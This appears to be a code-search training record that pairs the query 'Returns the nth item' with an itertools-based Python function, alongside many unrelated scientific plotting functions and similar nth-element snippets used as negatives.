bbox_to_anchor=(1, 1.05))\n# \n\n plt.xticks(range(0,288,24),('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\n# ax2 = plt.subplot(2,1,2, sharex=ax1)\n# plt.plot(multiplier*monthlyData[energyType][indices['H'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for H', color='r')\n# plt.plot(multiplier*monthlyData[energyType][indices['C'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for C', color='b')\n# plt.plot(multiplier*monthlyData[energyType][indices['L'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for L', color='g')\n# plt.plot(multiplier*monthlyData[energyType][indices['PV'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for PV', color='c')\n# plt.plot(multiplier*monthlyData[energyType][indices['E_HCL'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for HCL', color='m')\n# plt.plot(multiplier*monthlyData[energyType][indices['E_tot'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for E_tot', color='k')\n# plt.plot(multiplier*monthlyData[energyType][indices['45'],:]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'fixed at 45 deg', color='y')\n# plt.ylabel('Energy Difference [kWh]')\n# plt.legend()\n#\n# ax2.xaxis.set_major_locator(majorLocator)\n# ax2.xaxis.set_major_formatter(majorFormatter)\n# ax2.xaxis.set_minor_locator(minorLocator)\n## ax2.xaxis.set_minor_formatter(minorFormatter)\n# plt.grid(True, which='both')\n# \n return fig", "def plot_dimer_energy(self, axis=None):\n x_scan = np.linspace(0.5, 2.5, 100)\n E_scan = self.dimer_energy(\n np.array([-0.5 * x_scan, np.zeros(100), 0.5 * x_scan, np.zeros(100)]).T\n )\n E_scan -= E_scan.min()\n\n import matplotlib.pyplot as plt\n\n if axis is None:\n axis = plt.gca()\n # plt.figure(figsize=(5, 4))\n axis.plot(x_scan, E_scan, linewidth=2)\n axis.set_xlabel(\"x / a.u.\")\n axis.set_ylabel(\"Energy / kT\")\n axis.set_ylim(E_scan.min() - 2.0, E_scan[int(E_scan.size / 2)] + 2.0)\n\n return x_scan, E_scan", "def mc_energyplot(energy_array):\n \n\n plt.plot(energy_array, \"r-\", label=\"energy\")\n\n plt.xlabel(\"No. of steps\")\n plt.ylabel(\"Total Energy (kJ/mol)\")\n \n plt.title(\"Total energy vs steps\")\n plt.legend(loc=1, fontsize= 'x-large')\n plt.show()", "def plotERP(self, ep):\n import os \n import matplotlib.pyplot as plt\n \n try:\n filename = ep.filename.split('\\\\')[-1].split('.fif')[0]\n filename = 'plotsEEG_'+filename.split('_')[0] \n except Exception as err: \n filename = 'plots_eeg_file' \n print(err) \n finally:\n print('Saving ERP plots at >>>>', os.getcwd())\n \n try:\n os.mkdir(os.path.join(os.getcwd(), filename)) \n os.chdir(os.path.join(os.getcwd(), filename)) \n except Exception as err:\n print(err) \n \n \n ep = ep.interpolate_bads(reset_bads='True', mode = 'accurate')\n ep.info['bads'] = []\n \n ep.plot_psd(area_mode='range',fmin=0, fmax=40, tmax=10.0).savefig(filename + '_psd')\n\n# picks = ['FC2', 'C4', 'Cz', 'C5', 'FC1'] \n \n ep.plot_image(picks = None, cmap='interactive', sigma=1) \n \n plt.savefig(filename + '_image') \n \n bands = [(0, 4, 'Delta'), (4, 8, 'Theta'), (8, 12, 'Alpha'),\n (12, 30, 'Beta'), (30, 45, 'Gamma')] \n \n ep.plot_psd_topomap(bands=bands, vmin=None, vmax=None, \n tmin=0, tmax=0.5).savefig(filename + '_psd_topo')\n \n ep.plot_sensors().savefig(filename + '_sensors_') \n \n ep.plot_topo_image(vmin=-25, vmax=25, title='ERF images', sigma=3.,\n fig_facecolor='w', font_color='k').savefig(filename + '_image_topo') \n \n ep.average().plot().savefig(filename + 'erp_average_')\n ep.average().plot_image().savefig(filename + '_erp_average_image')\n print('Saving ERP plots at >>>>', os.getcwd())", "def plot_e_field(ax, data, timestep, label): \r\n ax.set_zlim(-0.5, 1) \r\n ax.view_init(elev=15., azim=25) \r\n ax.plot_surface(Y, X, data, rstride=1, cstride=1, color='red', edgecolor='yellow', linewidth=.25)\r\n ax.zaxis.set_rotate_label(False) \r\n ax.set_zlabel(r' $E_{Z}$', rotation=90, labelpad=10, fontsize=14) \r\n ax.set_zticks([-0.5, 0, 0.5, 1]) \r\n ax.set_xlabel('Position(cm)') \r\n ax.set_ylabel('Position(cm)') \r\n ax.set_xticks(np.arange(0, 50, step=20)) \r\n ax.set_yticks(np.arange(0, 50, step=20)) \r\n ax.text2D(0.6, 0.7, \"T = {}\".format(timestep), transform=ax.transAxes) \r\n ax.xaxis.pane.fill = ax.yaxis.pane.fill = ax.zaxis.pane.fill = False \r\n plt.gca().patch.set_facecolor('white') \r\n ax.text2D(-0.05, 0.8, \"({})\".format(label), transform=ax. transAxes) \r\n ax.dist = 11\r\n # Plot the E field at each of the four time steps saved earlier\r", "def plotDihedralEnergy(self, phys, forces, step): \r\n self.plotQuantity(step, phys.app.energies.getTable(4), 'dihedralenergy')", "def plot_Emax(xs, **kw):\n\n #get plotting objects\n fig, ax = _prepare_fig(**kw)\n #get plotting specs\n xmax = _find_xmax(xs)\n #init handles and labels lists for legend\n kw['H'], kw['L'] = [], []\n #plot the field curve\n x = xs.fields['Emax'][-xmax:xmax].index.values\n y = xs.fields['Emax'][-xmax:xmax].values\n kw['H'].append(ax.plot(x, y, color=_E_color, linewidth=_fields_linewidth)[0])\n kw['L'].append(r'Electric Field (kV/m)')\n #plot wires\n _plot_wires(ax, xs.hot, xs.gnd, xs.fields['Emax'], **kw)\n _check_und_conds([xs], [ax], **kw)\n #plot ROW lines\n _plot_ROW_edges(ax, xs.lROW, xs.rROW, **kw)\n #set axis text and legend\n ax.set_xlabel(r'Distance (ft)')\n ax.set_ylabel(r'Maximum Electric Field (kV/m)')\n ax.set_title(textwrap.fill('Maximum Electric Field - %s' % xs.title))\n ax.legend(kw['H'], kw['L'], **_leg_kw)\n _format_line_axes_legends(ax)\n #save the fig or don't, depending on keywords\n _save_fig(xs.sheet, fig, **kw)\n #return\n return(fig, ax)", "def display_energy_levels_0d(diagram, num_atoms, atoms, h_poly):\n h = eval_hamiltonian(num_atoms, h_poly, (1, 1))\n\n e, v = eigensystem(h)\n\n left = 0\n bottom = 0\n right = max([len(row) for row in diagram.split('\\n')])\n top = len(diagram.split('\\n'))\n\n plot_rows = numpy.ceil(math.sqrt(num_atoms+1))\n plot_cols = plot_rows\n\n for i in range(num_atoms):\n matplotlib.pyplot.subplot(plot_rows, plot_cols, i+1, axisbg=\"#000000\")\n y = [atom[0] for atom in atoms]\n x = [atom[1] for atom in atoms]\n c = numpy.abs(v[i]*v[i])\n\n matplotlib.pyplot.title('E = %f' % numpy.real(e[i]), fontsize = 10)\n norm = matplotlib.colors.Normalize(vmin = min(c),\n vmax = max(0.0001, max(c)))\n #x = [0,0,1,1]\n #y = [0,1,0,1]\n #c = [1,2,3,4]\n matplotlib.pyplot.hexbin(x, y, C = c,\n gridsize = (right-left, top-bottom),\n extent = (left, right, bottom, top),\n cmap = matplotlib.pyplot.get_cmap(\"gray\"),\n norm = norm\n )\n\n matplotlib.pyplot.subplot(plot_rows, plot_cols, num_atoms+1)\n matplotlib.pyplot.scatter(num_atoms*[0], e, s = 0.1)", "def plot_energy_dependence(self, ax=None, offset=None, energy=None, **kwargs):\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n if offset is None:\n offset = Angle(np.linspace(0.5, 2, 4), 'deg')\n\n if energy is None:\n energy = self.energy\n\n for off in offset:\n area = self.evaluate(off, energy)\n label = 'offset = {:.1f}'.format(off)\n ax.plot(energy, area.value, label=label, **kwargs)\n\n ax.loglog()\n ax.set_ylim(1e2, 1e7)\n ax.set_xlabel('Energy ({0})'.format(self.energy.unit))\n ax.set_ylabel('Effective Area ({0})'.format(self.eff_area.unit))\n ax.legend(loc='lower right')\n\n return ax", "def plot_field_uncertainties():\n\n resize_size = (1000, 1000)\n\n\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n if drug_name == 'DMSO':\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/30_hours/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n\n def transform(x):\n if type(x) is np.ndarray:\n x = change_array_lims(x)\n x = np.log(x)\n return x\n\n F_unc_vmin = -7\n F_unc_vmax = -4\n sigma_vmin = -5\n sigma_vmax = 0 #0.4\n sigma_unc_vmin = -6\n sigma_unc_vmax = -2\n\n fig_Fs = [plt.figure() for _ in range(3)]\n fig_uncertainty = plt.figure()\n sigma_lists, F_arrays = [], []\n for idx_fig, dir in enumerate(dirs):\n\n p_list = _load_and_resize_list(dir+'p_list_0.pickle')\n D_list = _load_and_resize_list(dir+'D_list_0.pickle')\n U_array = pickle.load(open(dir+'U.pickle', 'rb'))\n U_array = cv2.resize(U_array, resize_size, interpolation = cv2.INTER_LINEAR)\n Gx, Gy = np.gradient(U_array, 26./resize_size[0], 26./resize_size[0]) # gradients with respect to x and y\n F_array = (Gx**2+Gy**2)**.5 # gradient magnitude\n F_array[np.isinf(F_array)] = np.nan\n F_array[p_list[-1]<1e-3]=np.nan # final PDF\n sigma_list = []\n for j in range(9):\n arr = D_list[2*j] # current PDF\n arr[p_list[j]<1e-3]=np.nan\n sigma_list.append(np.sqrt(2*arr))\n\n\n sigma_lists.append(sigma_list)\n F_arrays.append(F_array)\n\n ax = fig_Fs[idx_fig].add_subplot(111)\n ax.imshow(transform(F_array)[::-1, :], cmap = cmap, vmin = -4.6, vmax = -2)\n ax.set_title(dir)\n\n all_axes = [i for j in fig_Fs for i in j.axes]\n for ax in all_axes:\n ax.axis('off')\n\n # uncertainties\n\n std = np.std(F_arrays, axis = 0)\n ax = fig_uncertainty.add_subplot(121)\n ax.imshow(transform(std)[::-1, :], cmap = cmap, vmin = F_unc_vmin, vmax = F_unc_vmax)\n ax.set_title('F_uncertainty')\n\n fig_sigma = plt.figure()\n ax = fig_sigma.add_subplot(111)\n ax.imshow(transform(np.nanmean(sigma_lists[0], axis = 0))[::-1, :], cmap = cmap, vmin = sigma_vmin, vmax = sigma_vmax) # index 0 (i.3 'original' is corresponds to the landscapes in other figures)\n ax.set_title('sigma_mean')\n\n sigma_means = [np.nanmean(sigma_list, axis = 0) for sigma_list in sigma_lists]\n std_array = np.nanstd(sigma_means, axis = 0)\n ax = fig_uncertainty.add_subplot(122)\n ax.imshow(transform(std_array)[::-1, :], cmap = cmap, vmin = sigma_unc_vmin, vmax = sigma_unc_vmax)\n ax.set_title('sigma_uncertainty')\n\n fig_sigma.savefig(path_to_here+'/../outputs/{}_mean_sigma.png'.format(drug_name), dpi = 1200)\n fig_uncertainty.savefig(path_to_here+'/../outputs/{}_uncertainties.png'.format(drug_name), dpi = 1200)", "def plot_vanHove_dt(comp,conn,start,step_size,steps):\n \n (fin,) = conn.execute(\"select fout from comps where comp_key = ?\",comp).fetchone()\n (max_step,) = conn.execute(\"select max_step from vanHove_prams where comp_key = ?\",comp).fetchone()\n Fin = h5py.File(fin,'r')\n g = Fin[fd('vanHove',comp[0])]\n\n temp = g.attrs['temperature']\n dtime = g.attrs['dtime']\n\n\n # istatus = plots.non_i_plot_start()\n \n fig = mplt.figure()\n fig.suptitle(r'van Hove dist temp: %.2f dtime: %d'% (temp,dtime))\n dims = figure_out_grid(steps)\n \n plt_count = 1\n outs = []\n tmps = []\n for j in range(start,start+step_size*steps, step_size):\n (edges,count,x_lim) = _extract_vanHove(g,j+1,1,5)\n if len(count) < 50:\n plt_count += 1\n continue\n #count = count/np.sum(count)\n \n sp_arg = dims +(plt_count,)\n ax = fig.add_subplot(*sp_arg)\n ax.grid(True)\n\n \n alpha = _alpha2(edges,count)\n \n ax.set_ylabel(r'$\\log{P(N)}$')\n ax.step(edges,np.log((count/np.sum(count))),lw=2)\n ax.set_title(r'$\\alpha_2 = %.2f$'%alpha + ' j:%d '%j )\n ax.set_xlim(x_lim)\n plt_count += 1\n\n mplt.draw()\n\n # plots.non_i_plot_start(istatus)\n\n del g\n Fin.close()\n del Fin", "def simulation_energy_over_time(E, T_ns, T_ns_threshold):\n no_start = (T_ns > T_ns_threshold)\n # (x, y, labels_dict, file_title, plot_title)\n generate_2D_plot(T_ns[no_start], E[no_start],\n {'x': r'time [$ns$]',\n 'y': r'E [$kcal/mol/A^2$]'},\n \"energy_graph\",\n \"Energy(time) graph\")", "def plotMEC(dimensions = 2, J = 1, filename = None,N = [20], \\\r\n anneal = True, Tlim = [1,4], prelims = 50, sweeps = 200, \\\r\n plots = True, plainlines = False, steps = 150):\r\n \r\n #temperature linespace\r\n T = np.linspace(Tlim[0],Tlim[1], steps)\r\n \r\n #tabulated magnetisation arry list\r\n Ms = []\r\n \r\n #tabulated energy array list\r\n Es = []\r\n \r\n #tabulated heat capacities\r\n Cs = []\r\n \r\n #labels used for datasets in the plots\r\n labels = []\r\n \r\n #critical exponent function used to fit data.\r\n def f (x, p1, p2, p3) : return p1*(((p2-x)/p2) ** p3)\r\n \r\n \r\n \r\n #itterate over wanted values of N\r\n for k in range(len(N)):\r\n \r\n #magnetisations and energies for N(i)\r\n M = np.zeros(T.shape)\r\n E = np.zeros(T.shape)\r\n C = np.zeros(T.shape)\r\n \r\n #lattice for N(i)\r\n lattice = initialiser(N[k],dimensions = dimensions)\r\n\r\n\r\n \r\n #itterate over all temperatures, highest first\r\n for i in range(len(T)):\r\n #highest first\r\n index = len(T) - i - 1\r\n \r\n #run simulation\r\n (Mi,Ei,l) = simulation(N[k],T[index],sweeps, lattice,\\\r\n dimensions = dimensions, J = J, prelims = prelims)\r\n \r\n #tabulate obtained data\r\n M[index] = np.abs(np.mean(Mi))\r\n E[index] = np.mean(Ei)\r\n Ci = (np.std(Ei)/T[index] * N[k] /2)**2\r\n C[index] = np.mean(Ci)\r\n \r\n #change lattice that will be fed to the next simulation\r\n if anneal:\r\n lattice = l \r\n \r\n #tabulate data for N(i)\r\n Ms.append(M)\r\n Es.append(E)\r\n Cs.append(C)\r\n \r\n labels.append(\"N = \"+str(N[k]))\r\n \r\n if plots:\r\n orderpar = \"Magnetisation\" if J>0 else \"Staggered Magnetisation\"\r\n \r\n #plot data\r\n magfigure = makeplot(T,Ms, labels, \"Temperature / $[J/k_B]$\", orderpar,\\\r\n plainlines=plainlines)\r\n \r\n magfigure.show()\r\n \r\n enfigure = makeplot(T,Es, labels, \"Temperature / $[J/k_B]$\", \"Energy per spin / $[J]$\",\\\r\n plainlines=plainlines)\r\n enfigure.show()\r\n \r\n cfigure = makeplot(T, Cs, labels, \"Temperature / $[J/k_B]$\", \"Heat Capacity / $[k_B]$\",\\\r\n plainlines=plainlines)\r\n cfigure.show()\r\n \r\n #save plots\r\n if filename is not None:\r\n magfigure.savefig(filename+\".svg\")\r\n enfigure.savefig(filename+\"E.svg\")\r\n cfigure.savefig(filename+\"C.svg\")\r\n \r\n return(T, Ms, Cs)", "def magn_plot(names, values, data, model_key, plot_key=False):\n zpicks = data['zpicks']\n\n # Corrected absolute magnitude M of SN.\n M = values[0]\n\n dlpc, da, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n # Calculating apparent magnitudes of supernovae at the simulated\n # luminosity distances using the distance modulus formula.\n mag = 5 * np.log10(dlpc/10) + M\n z = plot_var['z']\n if model_key == 'waterfall':\n plt.figure()\n plt.title(r'$\\bar \\Omega$ evolution in waterfall')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\bar \\Omega$')\n plt.plot(z, plot_var['ombar_m'], label='ombar_m vs redshift')\n plt.plot(z, plot_var['ombar_r'], label='ombar_r vs redshift')\n plt.plot(z, plot_var['a_ombar'], label='a_ombar vs redshift')\n plt.plot(z, plot_var['b_ombar'], label='b_ombar vs redshift')\n plt.plot(z, plot_var['c_ombar'], label='c_ombar vs redshift')\n plt.plot(z, plot_var['ombar_de'], label='ombar_de vs redshift')\n plt.legend()\n\n sum_om = plot_var['ombar_m'] + plot_var['ombar_r'] + plot_var['a_ombar']+ plot_var['b_ombar'] + plot_var['c_ombar'] + plot_var['c_ombar'] +plot_var['ombar_de']\n om_m = plot_var['ombar_m']/sum_om\n om_r = plot_var['ombar_r']/sum_om\n om_a = plot_var['a_ombar']/sum_om\n om_b = plot_var['b_ombar']/sum_om\n om_c = plot_var['c_ombar']/sum_om\n om_de = plot_var['ombar_de']/sum_om\n\n plt.figure()\n plt.title(r'$\\Omega$ evolution in waterfall')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\Omega$')\n plt.plot(z, om_m, label = 'om_m')\n plt.plot(z, om_r, label = 'om_r')\n plt.plot(z, om_a, label = 'om_a')\n plt.plot(z, om_b, label = 'om_b')\n plt.plot(z, om_c, label = 'om_c')\n plt.plot(z, om_de, label = 'om_de')\n plt.legend()\n plt.show()\n\n elif model_key == 'LCDM':\n plt.figure()\n plt.title(r'$\\bar \\Omega$ evolution in LCDM')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\bar \\Omega$')\n plt.plot(z, plot_var['ombar_m'], label='ombar_m vs redshift')\n plt.plot(z, plot_var['ombar_de'], label='ombar_de vs redshift')\n plt.legend()\n\n sum_om = plot_var['ombar_m'] + plot_var['ombar_de']\n om_m = plot_var['ombar_m']/sum_om\n om_de = plot_var['ombar_de']/sum_om\n\n plt.figure()\n plt.title(r'$\\Omega$ evolution in LCDM')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\Omega$')\n plt.plot(z, om_m, label = 'om_m')\n plt.plot(z, om_de, label = 'om_de')\n plt.legend()\n plt.show()\n\n elif model_key == 'exotic':\n plt.figure()\n plt.title(r'$\\bar \\Omega$ evolution in LCDM')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\bar \\Omega$')\n plt.plot(z, plot_var['ombar_m'], label='ombar_m vs redshift')\n plt.plot(z, plot_var['ombar_r'], label='ombar_r vs redshift')\n plt.plot(z, plot_var['ombar_de'], label='ombar_de vs redshift')\n plt.legend()\n\n sum_om = plot_var['ombar_m'] + plot_var['ombar_r'] + plot_var['ombar_de']\n om_m = plot_var['ombar_m']/sum_om\n om_r = plot_var['ombar_r']/sum_om\n om_de = plot_var['ombar_de']/sum_om\n\n plt.figure()\n plt.title(r'$\\Omega$ evolution in LCDM')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\Omega$')\n plt.plot(z, om_m, label = 'om_m')\n plt.plot(z, om_r, label = 'om_r')\n plt.plot(z, om_de, label = 'om_de')\n plt.legend()\n plt.show()\n\n if plot_key:\n # Plotting evolution of parameters in the model.\n import plots\n plots.modelcheck(mag, zpicks, plot_var, model_key)\n\n return mag", "def calculate_and_visualize_energy_spectrum(CV):\n E = 1 / (2 / np.pi)**2 * np.fft.fft2(CV) * 0.33 * 0.33\n # here the unit of CV is still the same as U and V (typically px/s), thus the unit of the correlation is px2/s2.\n # To convert the unit to um2/s2, multiply the correlation by mpp^2 (0.33^2 for 20x lens)\n k, K = corrLib.compute_wavenumber_field(E.shape, 25*0.33)\n\n ind = np.argsort(k.flatten())\n k_plot = k.flatten()[ind]\n E_plot = E.flatten()[ind]\n\n fig, ax = plt.subplots(nrows=1, ncols=2, dpi=300, figsize=(7, 3))\n ax[0].plot(k_plot, E_plot.real, lw=0.5, ls='--', alpha=0.5, label='real')\n ax[0].plot(k_plot, E_plot.imag, lw=0.5, ls='--', alpha=0.5, label='imag')\n ax[0].plot(k_plot, abs(E_plot), lw=0.5, label='abs') \n ax[0].legend()\n # ax[1].plot(k_plot, E_plot.real, lw=0.5, ls='--', alpha=0.5, label='real')\n # ax[1].plot(k_plot, E_plot.imag, lw=0.5, ls='--', alpha=0.5, label='imag')\n ax[1].plot(k_plot, abs(E_plot), lw=0.5, label='abs', color=bestcolor(2))\n ax[1].loglog()\n ax[1].legend()\n\n # guide of the eye slope\n x = np.array([0.01,0.03])\n y = x ** -1.3 * 2e1\n ax[1].plot(x, y, lw=0.5, ls='--', color='black')\n ax[1].text(x.mean(), 1.1*y.mean(), '-1.3')", "def plotImproperEnergy(self, phys, forces, step): \r\n self.plotQuantity(step, phys.app.energies.getTable(5), 'improperenergy')", "def plot_2d(self):\n fig = plt.figure(figsize=(10,8))\n \n d = int(len(self.a_scale.flat)**0.5)\n a_scale = self.a_scale.reshape(d,d)\n c_scale = self.c_scale.reshape(d,d)\n E_coh = self.E_coh.reshape(d,d)\n plt.pcolormesh(a_scale, c_scale, E_coh)\n plt.xlabel('xy linear deformation coefficient')\n plt.xlabel('z linear deformation coefficient')\n cbar = plt.colorbar()\n cbar.ax.set_ylabel('cohesive energy (eV/atom)',\n fontsize='x-large')\n plt.show()\n \n return fig", "def plot_ewald_coverage(energy_kev, color='k', linewidth=2):\n\n q_max = fc.calqmag(180, energy_kev)\n\n # calculate diffractometer angles\n angles = np.arange(0, 180, 0.1)\n Q1x, Q1y = fc.diffractometer_Q(angles, 180, energy_kev) # delta=180\n Q2x, Q2y = fc.diffractometer_Q(angles, angles, energy_kev) # eta=delta\n Q3x, Q3y = fc.diffractometer_Q(0, angles, energy_kev) # eta=0\n\n # Add diffractometer angles\n plt.plot(Q1x, Q1y, color, linewidth, label=r'2$\\theta$=180')\n plt.plot(Q2x, Q2y, color, linewidth, label=r'2$\\theta$=$\\theta$')\n plt.plot(Q3x, Q3y, color, linewidth, label=r'$\\theta$=0')\n plt.axis([-q_max, q_max, 0, q_max])", "def plot_1D_edp(self, start=(-10,25), end=(30,-20), N=100):\n rho = []\n x0, z0 = start\n x1, z1 = end\n xpoints = np.linspace(x0, x1, N)\n zpoints = np.linspace(z0, z1, N)\n for x, z in zip(xpoints, zpoints):\n tmp = self.phase * self.F * np.cos(self.qx*x+self.qz*z)\n dist = np.sqrt((x-x0)**2 + (z-z0)**2)\n rho.append([dist, tmp.sum(axis=0)])\n rho = np.array(rho, float)\n X = rho[:,0]\n Y = rho[:,1]\n plt.figure()\n plt.plot(X, Y)", "def results_plot_fuel_reactor(self):\n \n import matplotlib.pyplot as plt \n\n # Total pressure profile\n P = []\n for z in self.MB_fuel.z:\n P.append(value(self.MB_fuel.P[z]))\n fig_P = plt.figure(1)\n plt.plot(self.MB_fuel.z, P)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Total Pressure [bar]\") \n\n # Temperature profile\n Tg = []\n Ts = []\n# Tw = []\n for z in self.MB_fuel.z:\n Tg.append(value(self.MB_fuel.Tg[z] - 273.15))\n Ts.append(value(self.MB_fuel.Ts[z] - 273.15))\n# Tw.append(value(self.MB_fuel.Tw[z]))\n fig_T = plt.figure(2)\n plt.plot(self.MB_fuel.z, Tg, label='Tg')\n plt.plot(self.MB_fuel.z, Ts, label='Ts')\n# plt.plot(self.MB_fuel.z, Tw, label='Tw')\n plt.legend(loc=0,ncol=2)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Temperature [C]\") \n \n # Superficial gas velocity and minimum fluidization velocity\n vg = []\n umf = []\n for z in self.MB_fuel.z:\n vg.append(value(self.MB_fuel.vg[z]))\n umf.append(value(self.MB_fuel.umf[z]))\n fig_vg = plt.figure(3)\n plt.plot(self.MB_fuel.z, vg, label='vg')\n plt.plot(self.MB_fuel.z, umf, label='umf')\n plt.legend(loc=0,ncol=2)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Superficial gas velocity [m/s]\")\n \n # Gas components molar flow rate\n for j in self.MB_fuel.GasList:\n F = []\n for z in self.MB_fuel.z:\n F.append(value(self.MB_fuel.F[z,j]))\n fig_F = plt.figure(4)\n plt.plot(self.MB_fuel.z, F, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.GasList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Gas component molar flow rate, F [mol/s]\") \n \n # Bulk gas phase total molar flow rate\n Ftotal = []\n for z in self.MB_fuel.z:\n Ftotal.append(value(self.MB_fuel.Ftotal[z]))\n fig_Ftotal = plt.figure(5)\n plt.plot(self.MB_fuel.z, Ftotal)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Total molar gas flow rate [mol/s]\") \n\n # Solid components mass flow rate\n for j in self.MB_fuel.SolidList:\n M = []\n for z in self.MB_fuel.z:\n M.append(value(self.MB_fuel.Solid_M[z,j]))\n fig_M = plt.figure(6)\n plt.plot(self.MB_fuel.z, M, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.SolidList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Solid components mass flow rate [kg/s]\")\n \n # Bulk solid phase total molar flow rate\n Mtotal = []\n for z in self.MB_fuel.z:\n Mtotal.append(value(self.MB_fuel.Solid_M_total[z]))\n fig_Mtotal = plt.figure(7)\n plt.plot(self.MB_fuel.z, Mtotal)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Solid total mass flow rate [kg/s]\") \n \n # Gas phase concentrations\n for j in self.MB_fuel.GasList:\n Cg = []\n for z in self.MB_fuel.z:\n Cg.append(value(self.MB_fuel.Cg[z,j]))\n fig_Cg = plt.figure(8)\n plt.plot(self.MB_fuel.z, Cg, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.GasList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Concentration [mol/m3]\") \n \n # Gas phase mole fractions\n for j in self.MB_fuel.GasList:\n y = []\n for z in self.MB_fuel.z:\n y.append(value(self.MB_fuel.y[z,j]))\n fig_y = plt.figure(9)\n plt.plot(self.MB_fuel.z, y, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.GasList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"y [-]\") \n \n # Solid phase mass fractions\n for j in self.MB_fuel.SolidList:\n x = []\n for z in self.MB_fuel.z:\n x.append(value(self.MB_fuel.x[z,j]))\n fig_x = plt.figure(10)\n plt.plot(self.MB_fuel.z, x, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.SolidList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"x [-]\") \n\n # Total mass fraction\n xtot = []\n for z in self.MB_fuel.z:\n xtot.append(value(self.MB_fuel.xtot[z]))\n fig_xtot = plt.figure(11)\n plt.plot(self.MB_fuel.z, xtot)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Total mass fraction [-]\") \n \n # # Gas mix density\n # rhog = []\n # for z in self.MB_fuel.z:\n # rhog.append(value(self.MB_fuel.rho_vap[z]))\n # fig_rhog = plt.figure(23)\n # plt.plot(self.MB_fuel.z, rhog)\n # plt.grid()\n # plt.xlabel(\"Bed height [-]\")\n # plt.ylabel(\"Gas mix density [kg/m3]\") \n \n # Fe conversion\n X_Fe = []\n for z in self.MB_fuel.z:\n X_Fe.append(value(self.MB_fuel.X[z])*100)\n fig_X_Fe = plt.figure(13)\n plt.plot(self.MB_fuel.z, X_Fe)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Fraction of metal oxide converted [%]\")" ]
[ "0.7072073", "0.6860298", "0.6784533", "0.6767711", "0.6717085", "0.64930975", "0.6264038", "0.62380916", "0.6227457", "0.62017035", "0.6190444", "0.61265624", "0.60596615", "0.6039065", "0.60338074", "0.59825134", "0.59809995", "0.5952686", "0.5921822", "0.5920559", "0.59139395", "0.5844829", "0.58424234", "0.58307946", "0.5811133", "0.5811126", "0.57887995", "0.5785455", "0.57846963", "0.5780625" ]
0.7414247
0
Returns the nth item
def nth(iterable, index): return next(itertools.islice(iterable, index, None))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def nth(n, seq):\n try:\n return seq[n]\n except TypeError:\n return next(itertools.islice(seq, n, None))", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(_list, n):\n n = lloc(_list, n)\n return [a[n] for a in _list]", "def nth(n, iterable, default = None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, next=next, islice=islice, default=None):\n return next(islice(iterable, n, None), default)", "def __getitem__(self, i):\n return self.get(i, i + 1)", "def __getitem__(self, n):\n return self._array[n]", "def getitem(s, i):\n while i > 0:\n s, i = rest(s), i - 1\n return first(s)", "def nth_element(iterable, n, first=0, last=None, key=None):\n assert hasattr(iterable, '__getitem__')\n last = last or len(iterable)\n pivot_idx = n\n pivot_idx = partition_with_pivot(iterable, pivot_idx, first=first, last=last, key=key)\n if n == pivot_idx:\n return\n elif n < pivot_idx:\n return nth_element(iterable, n, first, pivot_idx, key=key)\n else:\n return nth_element(iterable, n, pivot_idx+1, last, key=key)", "def __getitem__(self, index):\n ##if index == 0:\n ## return self.first\n ##else:\n ## return self.rest[index - 1]\n cur = self.first\n rest = self.rest\n while index != 0:\n cur, rest, index = rest.first, rest.rest, index - 1\n return cur", "def __getitem__(self,i):\n return self._items[i]", "def nth_element(input, n, reverse=False, name=None): # pylint: disable=redefined-builtin\n return gen_nn_ops.nth_element(input, n, reverse=reverse, name=name)", "def get_item(self,index):\n current = self.head\n count = 0\n \n while current != None and count <= index:\n count+=1\n current =current.get_next()\n \n if count!=index:\n print('Index out of bound')", "def __getitem__(self, i):\n\t\tif 